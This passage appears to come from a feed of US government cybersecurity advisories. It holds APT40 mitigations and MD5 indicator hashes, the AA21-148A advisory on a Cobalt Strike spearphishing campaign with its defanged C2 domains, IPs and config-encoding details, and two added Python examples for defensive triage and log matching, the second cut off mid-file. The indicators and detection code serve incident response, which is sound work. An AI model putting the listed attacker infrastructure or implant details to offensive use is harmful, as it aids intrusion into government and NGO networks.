        • Actively monitor server disk use and audit for significant changes.
        • Log Domain Name Service (DNS) queries and consider blocking all outbound DNS requests that do not originate from approved DNS servers. Monitor DNS queries for C2 over DNS.
        • Develop and monitor network and system baselines to allow for the identification of anomalous activity.
        • Audit logs for suspicious behavior.
        • Identify and suspend access of users exhibiting unusual activity.
        • Use allowlist or baseline comparison to monitor Windows event logs and network traffic to detect when a user maps a privileged administrative share on a Windows system.
        • Leverage multi-sourced threat-reputation services for files, DNS, URLs, IP addresses, and email addresses.
        • Network device management interfaces—such as Telnet, Secure Shell (SSH), Winbox, and HTTP—should be turned off for wide area network (WAN) interfaces and secured with strong passwords and encryption when enabled.
        • When possible, segment critical information on air-gapped systems.
        • Use strict access control measures for critical data.

    APPENDIX: APT40 Indicators of Compromise

    APT40 used the following domains, file names, and malware MD5 hash values to facilitate the CNE activity outlined in this CSA between 2009 and 2018.
    MD5 Malware Hashes (Updated July 19, 2021)

    Note: to uncover malicious activity, incident responders search for indicators of compromise (IOCs) in network- and host-based artifacts and assess the results—eliminating false positives during the assessment. For example, some MD5 IOCs in the table below identify legitimate tools—such as PuTTY, cmd.exe, svchost.exe, etc.—as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See Technical Approaches to Uncovering and Remediating Malicious Activity for more incident handling guidance.
e6adc73df12092012f8cd246ba619f90 e8881037f684190d5f6cc26aab93d40f e890fa6fd8a98fec7812d60f65bf1762 e8bc927ee0ae288609e1c37665a3314e e8e73156316df88dee28214fb203658b e957c36c9d69d6a8256b6ddf7f806f56 e9ce9b35e2386bf442e22a49243a647e eadcae9ecba1097571c8d08e9b1c1a9c eb06648b43d34f20fc1c40e509521e99 eb5e5db77540516e6400a7912ad0ef0d eb5e999753f5ea094d59bdae0c66901c eb5ee94048730b321e35394a0fb10a5d eb64867dc48f757f0afe05dbf605b72d eb88f415336f0dccedfc93405330c561 fae03ff044d6bb488e1a6f1c6428c510 fc2142bd72bd520338f776146903be67 fc9b8262905a80cc5381d520813d556d fccd3de1df131f9d74949d69426c24af fcd912fd7ed80e2cdf905873c6ced4ad ff804e266a83974775814870cc49b66b 11166f8319c08c70fc886433a7dac92d 1223302912ec70c7c8350268a13ad226 139e071dd83304cdcfd5280022a0f958 13c93dc9186258d6c335b16dc7bb3c8c 14e2b0e47887c3bfbddb3b66012cb6e8 15437cfedfc067370915864feec47678 15e1816280d6c2932ff082329d0b1c76 166694d13ac463ea1c2bed64fbbb7207 16a344cd612cca4f0944ba688609e3ac 16c0011ea01c4690d5e76d7b10917537 1734a2b176a12eba8b74b8ca00ef1074 18144e860d353600bbd2e917aed21fde 1815c3a7a4a6d95f9298abb5855a3701 181a5b55b7987b62b5236965f473ba3b 18c26c5800e9e2482f1507c96804023e 1932ce50b7b6c88014cf082228486e5c 1af78c50aca90ee3d6c3497848ac5705 1b44fb4aaff71b1f96cd049a9461eaf5 1bb8f32e6e0e089d6a9c10737cf19683 1c35a87f61953baace605fff1a2d0921 1c945a6b0deccc6cd2f63c31f255d0ec 1cb216777039fe6a8464fc6a214c3c86 1d3a10846819a07eef66deefcc33459a 1dd6c80b4ea5d83aff4480dcbbef520c 1e91f0f52994617651e9b4a449af551a 1eb568559e335b3ed78588e5d99f9058 1ef9c42efe6e9a08b7ebb16913fa0228 1f2befede815fcf65c463bf875fcf497 1f9bdc0435ff0914605f01db8ca77a65 1ffd883095ff3279b31650ca3a50ad3c 34521c0f78d92a9d95e4f3ff15b516db 34681367cbcc3933f0f4b36481bde44e 34aa195c604d0725d7dd2aa4cc4efe28 354b95e858bcaced369ecbfdec327e2b 35f456afbe67951b3312f3b35d84ff0a 3647d11c155d414239943c8c23f6e8ec 37578c69c515f1d0d49769930fba25ce 375cbb0a88111d786c33510bff258a21 37b9b4ed979bd2cf818e2783499bfb5e 3810a18650dbacecd10d257312e92f61 
3975740f65c2fa392247c60df70b1d6d 3a4ec0d0843769a937b5dadbe8ea56b1 3ab6bf23d5d244bc6d32d2626bd11c08 3bf8bb90d71d21233a80b0ec96321e90 3c2fe2dbdf09cfa869344fdb53307cb2 3c3d453ecf8cc7858795caece63e7299 3cbb46065f3e1dccbd707c340f38ce6b 3cf9dc0fdc2a6ab9b6f6265dc66b0157 3e89c56056e5525bf4d9e52b28fbbca7 3eb6f85ac046a96204096ab65bbd3e7e 3f50eedf4755b52aa7a7b740bd21daa6 3fefa55daeb167931975c22df3eca20a 4012acd80613aaa693a5d6cd4e7239ba 40528e368d323db0ac5c3f5e1efe4889 407c1ea99677615b80b2ffa2ed81d513 417949c717f78dc9e55ca81a5f7ade3e 4260e71d89f622c6a3359c5556b3aad7 429c10429a2ebb5f161e04159a59cf5b 4315975499cdc50098dbdb5b8aa4a199 44fa9c5df4ae20c50313aae02ba8fb95 4519b5d443a048a8599144900c4e1f28 45eb058edde4e5755a5ea1aff3ce3db7 460dc00ce690efacb5db8273c80e2b23 5b3050df93629f2f6cb3801ed19963c5 5b37ac4d642b96c4bf185c9584c0257a 5b3e945cd32a380f09ea98746f570758 5b72df8f6c110ae1d603354fcd8fe104 5c6f5cd81b099014718056e86b510fa2 5d63a3a02df2beda9d81f53abbd8264a 5d9c3cb239fa24bed2781bcf2898f153 5e353d1d17720c0f7c93f763e3565b3f 5f1c7f267fbe12210d3c80944f840332 5f393838220a6bf0cd9fd59c7cf97f5b 5f771966ef530ee0c2b42ef5cc46ad3a 6034ff91b376d653dc30f79664915b4e 603935efa89d93ea39b4b4d4a52ec529 607ea06890a6eedd723f629133576f20 60b2ce5ef4a076d1fa8675b584c27987 60cff7381b8fb64602816f9e5858930b 614909c72fa811ae41ea3d9b70122cee 6372d578e881abf76a4ec61e7a28da7d 63bf28f5dc6925a94c8b4e033a95be10 646cbeb4233948560ac50de555ea85ca 64db8e54d9a2daaa6d9cf156a8b73c18 675fe822243dfd1c3ace2a071d0aa6dd 67dbecfb5e0f2f729e57d0f1eda82c67 685cbba8cf2584a3378d82dec65aa0bb 693a4c2fcaa67fb87e62f150fb65e00e 6ad33ab8b9ff3f02964a8aab2a40ebb5 6b540be7ac7159104b0ffa536747f1bf 6b7276e4aa7a1e50735d2f6923b40de4 6b930be55ed4bf8e16b30eadc3873dfd 6c67f275d50f6bfee4848de6d4911931 6c9cfada134ede220b75087c7698ebf2 6e843ef4856336fe3ef4ed27a4c792b1 6e97bf1b7c44edc66622b43e81105779 86e50d6dc28283dbd295079252787577 870fbad5b9a54cb6720c122d1fa321ec 88b3b94574ba1eeb711a66eb04021eed 8956a045306b672d3cc852419a72c4b0 
8a9ac1b3ef2bf63c2ddfadbbbfd456b5 8b3b96327fbddebefe727ac2edad5714 8baa499b3e2f081ff47f8cf06a5e7809 8bc20fcd09adb7ea86dda2c57477633b 8be0c21b6ee56d0f68e0d90f7d0a26d7 8c80dd97c37525927c1e549cb59bcbf3 8d2416d9f6926fb0dc12ab5dafef691d 8d74922b2b31354ce588cefac71d9a9b 8e8fb7632c3a7e96cf0ea5299d564018 8ee6c9e1adb71b2623d5e7aa45df5f4d 8efaa987959ef95179a0f5be05c10faf 8fbf53f77c98daba277dae7661b86f02 8fc825df73977eeffaaa1587565f7505 90a3e3a2049c6eb9e39d113d9451a83f 932d355d9f2df2e8d8449d85454fc983 9450980a4413dfdbc60a62b257a7b019 947892152b8419a2dfe498be5063c1da 94d42ff06a588587131c2cd8a9b2fe96 95c15b7961e2d6fad96defa7ff2c6272 96ba4bf00d8b4acee9f550286610dcc7 97004f1962e2aed917dc2be5c908278f 972077c1bb73ca78b7cad4ac6d56c669 991ebcd03ace627093acc860fae739b5 99949240bc4eae33cac4bbb93b72349d 9a0a8048d53dedc763992fff32584741 9a0e3e80cd7c21812de81224f646715e 9a61ed5721cf4586abd1d49e0da55350 9b26999182ea0c2b2cac91919697289e 9c656ce22c93ca31c81ff8378a0a91ee ace620a0cc2684347e372f7e40e245d5 ad3b9e45192ec7c8085c3588cacb9c58 adb4f6ecb67732b7567486f0cee6e525 afa03ddb9fc64a795aadb6516c3bc268 b0269263ce024fc9de19f8f30bd51188 b04e895827c24070eb7082611ab79676 b059c9946ff67c62c074d6d15f356f6e b07299a907a4732d14da32b417c08af3 b1dadfcf459f8447b9ec44d8767da36d b2f1d2fefe9287f3261223b4b8219d03 b36f3e12cb88499f8795b8740ae67057 b4204f08c1a29fd4434e28b6219bfbc6 b4878c233d7f776a407f55a27b5effbc b6c12d88eeb910784d75a5e4df954001 b7ab5c6926f738dbe8d3a05cb4a1b4f5 b80dcd50e27b85d9a44fc4f55ff0a728 b8a61b1fda80f95a7dcdb0137bc89f67 b9642c1b3dbcccc9d84371b3163d43e0 b9647f389978f588d977ef6ef863938f b977bed98ae869a9bb9bf725215ef8e5 b9b627c470de997c01fdef4511029219 ba629216db6cf7c0c720054b0c9a13f3 badf0957c668d9f186fb218485d0d0f6 bb165b815e09fe95fa9282bce850528d bbfb478770a911cf055b8dfd8dcb36e4 bc4c189e590053d2cf97569c495c9610 bc9089c39bcdb1c3ef2e5bd25c77ed68 bd42303e7c38486df2899b0ccf3ce8f7 bd452dc2f9490a44bcff8478d875af4b bd6031dd85a578edf0bf1560caf36e02 bd63832e090819ea531d1a030fb04e9b 
be39ff1ec88a1429939c411113b26c02 be88741844bf7c47f81271270abe82dc ce26e91fc13ccb1be4b6bf6f55165410 ce449d7cb0a11b53b0513dde3bd57b1c ceba742bccb23304cf05d6c565dc53f8 cebe44b8a9a2d6e15a03d40d9e98e0ed cf946bc0faecb2dc8e8edc9e6ce2858f d09fcd9fa9ed43c9f28bcd4bd4487d22 d0b5c11ee5df0d78bdde3fdc45eaf21d d0d8243943053256bc1196e45fbf92d2 d0efc042ba4a6b207cf8f5b6760799d8 d20d01038e6ea10a9dcc72a88db5e048 d31596fe58ca278be1bb46e2a0203b34 d3df8c426572a85f3afa46e4cd2b66cd d59a77a8da7bec1f4bad7054a41b3232 d76b1c624e9227131a2791957955dddc d79477c9c688a8623930f4235c7228f6 d8a483d21504e73f0ba4b30bc01125d3 da46994fee26782605842005aabcd2fe daa232882b74d60443dfec8742401808 dab45ac39e34cfee60dcb005c3d5a668 dbc583d6d5ec8f7f0c702b209af975e2 dbe92b105f474efc4a0540673da0eb9c dbee8be5265a9879b61853cd9c0e4759 dc15ca49b39d1d17b22ec7580d32d905 dc386102060f7df285e9498f320f10e0 dd43cd0eddbb6f7cb69b1f469c37ec35 dd4e0f997e0b2cc9df28dca63ded6816 ddbdc6a3801906de598531b5b2dac02a dde4ff4e41f86426051f15da48667f5f ddecce92a712327c4068fabf0e1a7ff1 de608439f2bcc097b001d352b427bb68 deeb9b4789ac002aa8b834da76e70d74 df6475642f1fe122df3d7292217f1cff e011784958e7a00ec99b8f2320e92bf4 ec4cdc752c2ecd0d9f97491cc646a269 edb648f6c3c2431b5b6788037c1cd8ef ee3e297abd0a5b943dce46f33f3d56fb ee4862bc4916fc22f219e1120bea734a ef14448bf97f49a2322d4c79e64bb60b ef2738889e9d041826d5c938a256bc45 ef6fcdd1b55adf8ad6bcdf3d93fd109e efb5499492f08c1f10fecdeb703514d5 f0098aab593b65d980061a2df3a35c21 f073de9c169c8fcb2de5b811bff51cee f0881d5a7f75389deba3eff3f4df09ac f172ad4e906d97ed8f071896fc6789dc f2b6bffa2c22420c0b1c848b673055ed f446d8808a14649bddcc412f9e754890 f4dbe32f3505bc17364e2b125f8dd6df f4dd628f6c0bc2472d29c796ee38bf46 f4e67343e13c37449ada7335b9c53dd1 f53e332b0a6dbe8d8d3177e93b70cb1e f5ae03de0ad60f5b17b82f2cd68402fe f5ce889a1fa751b8fd726994cdb8f97e f5fdbfce1a5d2c000c266f4cd180a78d f7202dea71cc638e0c2dbeb92c2ce279 f7cef381c4ee3704fc8216f00f87552a f7ffbbbc68aadcbfbace55c58b6da0a7 f8b91554d221fe8ef4a4040e9516f919 
f906571d719828f0f4b6212fc2aa7705 f9155052a43832061357c23de873ff9f f9abacc459e5d50d8582e8c660752c4e f9f608407d551f49d632bd6bd5bd7a56 f9fc9359dc5d1d0ac754b12efb795f79 fa27742b87747e64c8cb0d54aa70ef98 fa3c8d91ef4a8b245033ddb9aa3054a2 fad93907d5587eb9e0d8ebc78a5e19c2

    Contact Information

    To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov.

    References

    - DOJ Press Release
    - Talos Intelligence: China Chopper Still Active 9 Years Later
    - CISA China Cyber Threat Overview webpage
    - CISA Alert TA15-314A: Compromised Web Servers and Web Shells - Threat Awareness and Guidance
    - CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities
    - CISA Alert AA20-275A: Potential for China Cyber Response to Heightened U.S.-China Tensions
    - NSA Cybersecurity Advisory U/OO/179811-20: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities

    Revisions

    - July 19, 2021: Initial version
    - Updated July 19, 2021: Added note and STIX file
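The note at the top of the hash list says that a match on a legitimate tool (PuTTY, cmd.exe, svchost.exe) only means something once the file's location has been checked. The Python below, added here as an example and not part of the CISA advisory or its STIX package, turns that into a triage step: it parses a space-separated MD5 list in the layout above, hashes files, and labels every hit as a known dual-use tool in its expected folder, a dual-use tool in a non-standard folder, or an artefact with no legitimate explanation. The hashes, file bytes and expected-location table are constructed for the demo; a real run would hash the files listed by an EDR or forensic image and use the advisory's hash list as input.

```python
"""Triage MD5 IOC hits the way the advisory's note asks: a match on a
legitimate tool is only interesting if the file lives somewhere it should not.

Added example; not part of the CISA advisory or its STIX package. All hashes,
file bytes and expected-location entries below are constructed for the demo.
"""
from __future__ import annotations

import hashlib
import re
from pathlib import Path, PureWindowsPath

# Where a dual-use tool is expected to live (constructed, lower-case Windows
# paths). A hit on one of these names anywhere else is treated as staging.
EXPECTED_LOCATIONS = {
    "cmd.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "putty.exe": {r"c:\program files\putty", r"c:\program files (x86)\putty"},
}

MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def parse_md5_list(text: str) -> set[str]:
    """Pull every 32-hex token out of a pasted hash list, lower-cased."""
    return {m.group().lower() for m in MD5_RE.finditer(text)}


def md5_of_bytes(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def md5_of_file(path: Path) -> str:
    """Stream a file through MD5 so large binaries do not need to fit in RAM."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(win_path: str, digest: str, ioc_hashes: set[str]) -> str:
    """Label one file given its Windows-style path and MD5."""
    if digest.lower() not in ioc_hashes:
        return "no-match"
    p = PureWindowsPath(win_path)
    expected = EXPECTED_LOCATIONS.get(p.name.lower())
    if expected is None:
        return "ioc-match"                    # not a known dual-use tool: treat as malicious
    if str(p.parent).lower() in expected:
        return "dual-use-expected-location"   # likely false positive; still confirm signer/version
    return "dual-use-nonstandard-location"    # legitimate tool staged by an intruder


def triage(inventory: dict[str, str], ioc_hashes: set[str]) -> dict[str, str]:
    """inventory maps path -> MD5, e.g. from an EDR export or forensic file listing."""
    return {path: classify(path, digest, ioc_hashes) for path, digest in inventory.items()}


# Constructed stand-in file contents; real tools would be hashed with md5_of_file.
SAMPLE_FILES = {
    r"C:\Windows\System32\cmd.exe": b"constructed bytes standing in for cmd.exe",
    r"C:\Users\Public\Music\cmd.exe": b"constructed bytes standing in for cmd.exe",  # same hash, wrong place
    r"C:\Users\Public\Music\putty.exe": b"constructed bytes standing in for putty.exe",
    r"C:\ProgramData\update.exe": b"constructed bytes standing in for an implant",
    r"C:\Windows\notepad.exe": b"constructed bytes for an unrelated file",
}

# Constructed hash list in the advisory's space-separated layout.
SAMPLE_IOC_TEXT = " ".join(
    md5_of_bytes(SAMPLE_FILES[p])
    for p in (r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\Music\putty.exe", r"C:\ProgramData\update.exe")
)


def run_demo() -> dict[str, str]:
    iocs = parse_md5_list(SAMPLE_IOC_TEXT)
    inventory = {path: md5_of_bytes(data) for path, data in SAMPLE_FILES.items()}
    return triage(inventory, iocs)


if __name__ == "__main__":
    for path, verdict in run_demo().items():
        print(f"{verdict:32} {path}")
```

The "dual-use-expected-location" label is deliberately not "clean": a hash hit on a system binary in System32 is almost always the stock file, but the responder still confirms the signer and version before closing it, as the note asks.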

  • AA21-148A: Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs
    by CISA on 28 Maggio 2021 at 10:29 pm

    Original release date: May 28, 2021 | Last revised: May 29, 2021

    Summary

    This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

    The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are engaged in addressing a spearphishing campaign targeting government organizations, intergovernmental organizations (IGOs), and non-governmental organizations (NGOs). A sophisticated cyber threat actor leveraged a compromised end-user account from Constant Contact, a legitimate email marketing software company, to spoof a U.S.-based government organization and distribute links to malicious URLs.[1] CISA and FBI have not determined that any individual accounts have been specifically targeted by this campaign.

    Note: CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear).[2,3] However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI will update this Joint Cybersecurity Advisory as new information becomes available.

    Note: This Joint Cybersecurity Advisory contains information on tactics, techniques, and procedures (TTPs) and malware associated with this campaign. For more information on the malware, refer to Malware Analysis Report MAR-10339794-1.v1: Cobalt Strike Beacon.

    CISA and FBI urge governmental and international affairs organizations and individuals associated with such organizations to adopt a heightened state of awareness and implement the recommendations in the Mitigations section of this advisory. For a downloadable list of indicators of compromise (IOCs), refer to AA21-148A.stix and MAR-10339794-1.v1.stix. Click here for a PDF version of this report.
    Technical Details

    Based on incident reports, malware collection, and trusted third-party reporting, CISA and FBI are engaged in addressing a sophisticated spearphishing campaign. A cyber threat actor leveraged a compromised end-user account from Constant Contact, a legitimate email marketing software company, to send phishing emails to more than 7,000 accounts across approximately 350 government organizations, IGOs, and NGOs. The threat actor sent spoofed emails that appeared to originate from a U.S. Government organization. The emails contained a legitimate Constant Contact link that redirected to a malicious URL [T1566.002, T1204.001], from which a malicious ISO file was dropped onto the victim’s machine. The ISO file contained (1) a malicious Dynamic Link Library (DLL) named Documents.dll [T1055.001], which is a custom Cobalt Strike Beacon version 4 implant, (2) a malicious shortcut file that executes the Cobalt Strike Beacon loader [T1105], and (3) a benign decoy PDF titled “Foreign Threats to the 2020 US Federal Elections” with file name “ICA-declass.pdf” (see figure 1).

    Note: The decoy file appears to be a copy of the declassified Intelligence Community Assessment pursuant to Executive Order 13848 Section 1(a), which is available at https://www.intelligence.gov/index.php/ic-on-the-record-database/results/1046-foreign-threats-to-the-2020-us-federal-elections-intelligence-community-assessment.

    Figure 1: Decoy PDF: ICA-declass.pdf

    Cobalt Strike is a commercial penetration testing tool used to conduct red team operations.[4] It contains a number of tools that complement the cyber threat actor’s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. The Cobalt Strike Beacon is the malicious implant that calls back to attacker-controlled infrastructure and checks for additional commands to execute on the compromised system [TA0011].
    The configuration file for this Cobalt Strike Beacon implant contained communications protocols, an implant watermark, and the following hardcoded command and control (C2) domains:

    - dataplane.theyardservice[.]com/jquery-3.3.1.min.woff2
    - cdn.theyardservice[.]com/jquery-3.3.1.min.woff2
    - static.theyardservice[.]com/jquery-3.3.1.min.woff2
    - worldhomeoutlet[.]com/jquery-3.3.1.min.woff2

    The configuration file was encoded via an XOR with the key 0x2e and a 16-bit byte swap. For more information on the ISO file and Cobalt Strike Beacon implant, including IOCs, refer to Malware Analysis Report MAR-10339794-1.v1: Cobalt Strike Beacon.

    Indicators of Compromise

    The following IOCs were derived from trusted third parties and open-source research. For a downloadable list of IOCs, refer to AA21-148A.stix and MAR-10339794-1.v1.stix.

    URL: https[:]//r20.rs6.net/tn.jsp?f=
    Host IP: 208.75.122[.]11 (US)
    Owner: Constant Contact, Inc.
    Activity: legitimate Constant Contact link found in phishing email that redirects victims to actor-controlled infrastructure at https[:]//usaid.theyardservice.com/d/<target_email_address>

    URL: https[:]//usaid.theyardservice.com/d/<target_email_address>
    Host IP: 83.171.237[.]173 (Germany)
    Owner: [redacted]
    First Seen: May 25, 2021
    Activity: actor-controlled URL that was redirected from https[:]//r20.rs6.net/tn.jsp?f=; the domain usaid[.]theyardservice.com was detected as a malware site; hosted a malicious ISO file "usaid[.]theyardservice.com"

    File: ICA-declass.iso [MD5: cbc1dc536cd6f4fb9648e229e5d23361]
    File Type: Macintosh Disk Image
    Detection: Artemis!7EDF943ED251, Trojan:Win32/Cobaltstrike!MSR, or other malware
    Activity: ISO file container; contains a custom Cobalt Strike Beacon loader; communicated with multiple URLs, domains, and IP addresses

    File: /d/ [MD5: ebe2f8df39b4a94fb408580a728d351f]
    File Type: Macintosh Disk Image
    Detection: Cobalt, Artemis!7EDF943ED251, or other malware
    Activity: ISO file container; contains a custom Cobalt Strike Beacon loader; communicated with multiple URLs, domains, and IP addresses

    File: ICA-declass.iso [MD5: 29e2ef8ef5c6ff95e98bff095e63dc05]
    File Type: Macintosh Disk Image
    Detection: Cobalt Strike, Rozena, or other malware
    Activity: ISO file container; contains a custom Cobalt Strike Beacon loader; communicated with multiple URLs, domains, and IP addresses

    File: Reports.lnk [MD5: dcfd60883c73c3d92fceb6ac910d5b80]
    File Type: LNK (Windows shortcut)
    Detection: Worm: Win32-Script.Save.df8efe7a, Static AI - Suspicious LNK, or other malware
    Activity: shortcut contained in malicious ISO files; executes a custom Cobalt Strike Beacon loader

    File: ICA-declass.pdf [MD5: b40b30329489d342b2aa5ef8309ad388]
    File Type: PDF
    Detection: undetected
    Activity: benign, password-protected PDF displayed to victim as a decoy; currently unrecognized by antivirus software

    File: DOCUMENT.DLL [MD5: 7edf943ed251fa480c5ca5abb2446c75]
    File Type: Win32 DLL
    Detection: Trojan: Win32/Cobaltstrike!MSR, Rozena, or other malware
    Activity: custom Cobalt Strike Beacon loader contained in malicious ISO files; observed by antivirus software communicating with multiple URLs, domains, and IP addresses

    File: DOCUMENT.DLL [MD5: 1c3b8ae594cb4ce24c2680b47cebf808]
    File Type: Win32 DLL
    Detection: Cobalt Strike, Razy, Khalesi, or other malware
    Activity: custom Cobalt Strike Beacon loader contained in malicious ISO files; observed by antivirus software communicating with multiple URLs, domains, and IP addresses

    Domain: usaid[.]theyardservice.com
    Host IP: 83.171.237[.]173 (Germany)
    First Seen: May 25, 2021
    Owner: Withheld for Privacy Purposes
    Activity: subdomain used to distribute ISO file according to the trusted third party; detected as a malware site by antivirus programs

    Domain: worldhomeoutlet[.]com
    Host IP: 192.99.221[.]77 (Canada)
    Created Date: March 11, 2020
    Owner: Withheld for Privacy Purposes by Registrar
    Activity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software; associated with Cobalt Strike malware

    Domain: dataplane.theyardservice[.]com
    Host IP: 83.171.237[.]173 (Germany)
    First Seen: May 25, 2021
    Owner: [redacted]
    Activity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software; observed in phishing, malware, and spam activity

    Domain: cdn.theyardservice[.]com
    Host IP: 83.171.237[.]173 (Germany)
    First Seen: May 25, 2021
    Owner: Withheld for Privacy Purposes by Registrar
    Activity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software

    Domain: static.theyardservice[.]com
    Host IP: 83.171.237[.]173 (Germany)
    First Seen: May 25, 2021
    Owner: Withheld for Privacy Purposes
    Activity: Cobalt Strike C2 subdomain according to the trusted third party; categorized as suspicious and observed communicating with multiple malicious files according to antivirus software

    IP: 192.99.221[.]77
    Organization: OVH SAS
    Resolutions: 7
    Geolocation: Canada
    Activity: detected as a malware site; hosts a suspicious domain worldhomeoutlet[.]com; observed in Cobalt Strike activity

    IP: 83.171.237[.]173
    Organization: Droptop GmbH
    Resolutions: 15
    Geolocation: Germany
    Activity: categorized as malicious by antivirus software; hosted multiple suspicious domains and multiple malicious files were observed downloaded from this IP address; observed in Cobalt Strike and activity

    Domain: theyardservice[.]com
    Host IP: 83.171.237[.]173 (Germany)
    Created Date: January 27, 2010
    Owner: Withheld for Privacy Purposes
    Activity: threat actor controlled domain according to the trusted third party; categorized as suspicious by antivirus software; observed in Cobalt Strike activity

    Table 1 provides a summary of the MITRE ATT&CK techniques observed.
    Table 1: MITRE ATT&CK techniques observed

    Technique Title                                   | Technique ID
    --------------------------------------------------|-------------
    Process Injection: Dynamic-link Library Injection | T1055.001
    Ingress Tool Transfer                             | T1105
    User Execution: Malicious Link                    | T1204.001
    Phishing: Spearphishing Link                      | T1566.002

    Mitigations

    CISA and FBI urge CI owners and operators to apply the following mitigations.

    - Implement multi-factor authentication (MFA) for every account. While privileged accounts and remote access systems are critical, it is also important to ensure full coverage across SaaS solutions. Enabling MFA for corporate communications platforms (as with all other accounts) provides vital defense against these types of attacks and, in many cases, can prevent them.
    - Keep all software up to date. The most effective cybersecurity programs quickly update all of their software as soon as patches are available. If your organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited.
    - Implement endpoint detection and response (EDR) tools. EDR allows a high degree of visibility into the security status of endpoints and can be an effective tool against threat actors. Note: Organizations using Microsoft Defender for Endpoint or Microsoft 365 Defender should refer to Microsoft: Use attack surface reduction rules to prevent malware infection for more information on hardening the enterprise attack surface.
    - Implement centralized log management for host monitoring. A centralized logging application allows technicians to look out for anomalous activity in the network environment, such as new applications running on hosts, out-of-place communication between devices, or unaccountable login failures on machines. It also aids in troubleshooting applications or equipment in the event of a fault. CISA and the FBI recommend that organizations:
      - Forward logs from local hosts to a centralized log management server—often referred to as a security information and event management (SIEM) tool.
      - Ensure logs are searchable. The ability to search, analyze, and visualize communications will help analysts diagnose issues and may lead to detection of anomalous activity.
      - Correlate logs from both network and host security devices. By reviewing logs from multiple sources, an organization can better triage an individual event and determine its impact to the organization as a whole.
      - Review both centralized and local log management policies to maximize efficiency and retain historical data. Organizations should retain critical logs for a minimum of 30 days.
    - Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers and other post-exploitation tools.
    - Implement unauthorized execution prevention by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
    - Configure and maintain user and administrative accounts using a strong account management policy.
      - Use administrative accounts on dedicated administration workstations.
      - Limit access to and use of administrative accounts.
      - Use strong passwords. For more information on strong passwords, refer to CISA Tip: Choosing and Protecting Passwords and National Institute of Standards and Technology (NIST) SP 800-63: Digital Identity Guidelines: Authentication and Lifecycle Management.
      - Remove default accounts if unneeded.
      - Change the password of default accounts that are needed.
      - Disable all unused accounts.
    - Implement a user training program and simulated attacks for spearphishing to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails.
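The mitigations above ask for centralized, searchable logs, correlation of network and host sources, and signatures for Cobalt Strike infrastructure. The Python below, added as an example rather than CISA tooling, shows one concrete form of that correlation: it refangs the network IOCs from this advisory, matches them against web-proxy log lines, and rates each client by what the sequence of its requests shows, so that a lone click on the legitimate Constant Contact redirector is recorded but does not page anyone, while repeated requests for the Beacon's jquery-3.3.1.min.woff2 path at an IOC host do. The log lines, the 10.0.0.0/24 clients and the 203.0.113.10 address are constructed; the domains, IPs, redirector and URI path are taken from the advisory.

```python
"""Match this advisory's network IOCs against web-proxy logs and correlate the
hits per client. Added example, not CISA tooling. Log lines, the 10.0.0.0/24
clients and 203.0.113.10 are constructed; domains, IPs and the beacon URI path
are taken from the advisory's IOC list (defanged there with [.] and [:]).
"""
from __future__ import annotations

import re
from collections import defaultdict

IOC_TEXT = """
usaid[.]theyardservice.com
dataplane.theyardservice[.]com
cdn.theyardservice[.]com
static.theyardservice[.]com
theyardservice[.]com
worldhomeoutlet[.]com
83.171.237[.]173
192.99.221[.]77
"""
BEACON_URI = "/jquery-3.3.1.min.woff2"   # C2 path from the Beacon configuration
LEGIT_REDIRECTOR = "r20.rs6.net"         # Constant Contact; legitimate on its own
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<host>\S+) (?P<ip>\S+) (?P<url>\S+)$")


def refang(s: str) -> str:
    """Undo the defanging used in advisories so indicators compare to live logs."""
    return s.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def load_iocs(text: str) -> tuple[set[str], set[str]]:
    domains, ips = set(), set()
    for token in text.split():
        token = refang(token).lower()
        (ips if IPV4_RE.fullmatch(token) else domains).add(token)
    return domains, ips


def domain_hit(host: str, domains: set[str]) -> bool:
    """Exact or subdomain match, so theyardservice.com also covers new subdomains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def parse_line(line: str):
    """Constructed proxy format: 'timestamp client dest_host dest_ip url'."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


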